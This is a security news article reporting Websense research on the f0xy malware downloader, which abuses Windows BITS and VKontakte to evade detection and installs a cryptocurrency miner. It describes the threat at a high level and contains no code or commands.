14 DAY TRIAL // Cybercriminals have developed a new tool to help them deliver malware to the victim’s computer in a surreptitious manner by abusing legitimate functionality in Windows and constantly improving the code.
The freshly discovered malware downloader has been dubbed “f0xy” by researchers at Websense, who took a look at its capabilities.
Minting digital coins is the end game
According to their analysis, the authors of the threat are continually working on it in order to reach a version compatible with a larger number of operating systems and which can go undetected for longer periods of time.
They found that f0xy relies on a dynamic list of command and control (C&C) servers in order to funnel in malicious files. Another strategy adopted by the authors to evade detection is using Microsoft's Background Intelligent Transfer Service to download the data.
Some of the samples identified by Websense dated from January 2015 and they could run only on Windows Vista and above. Newer versions have been developed, though, including support for Windows XP.
The malware downloaded by f0xy does not steal sensitive information such as passwords or financial details; instead, it appears that its operators use it to make money, literally as Websense noticed that it installs a crypto-currency miner on the affected system.
Several evasion tactics are used
As per the analysis of the security researchers, code and string obfuscation techniques is scarcely applied, in order to make it look legitimate and thus hide in plain sight.
Also contributing to it flying under the radar is contacting the Russian social networking website VKontakte to retrieve the list of C&C servers. Connections to this host would appear legitimate to malware detection tools, hence no suspicion is raised.
The same goes for the Background Intelligent Transfer Service (BITS) (bitsadmin.exe) in Windows, which is commonly employed for the delivery of updates for the operating system without impacting on the available bandwidth.
“Presumably the main reason for using BITS is to prevent security products from flagging its behavior as suspicious, because anti-malware solutions are much less likely to have a problem with bitsadmin.exe performing network requests than an unknown executable,” Websense says.
Unless stopped, f0xy will transfer and run CPUMiner on the compromised computer, and use the tool with CoinMine.pw, a script for mining different types of digital money. It also allows assigning multiple systems for “minting” the digital coins.
At the time of the analysis, only five out of 57 antivirus engines available at VirusTotal were able to detect the threat. However, subsequent scans three days ago showed improved detection as 10 products could identify the malicious piece.
The security researchers expect malware authors to focus more of their attention on the use of legitimate services in order to hide their malicious operations.
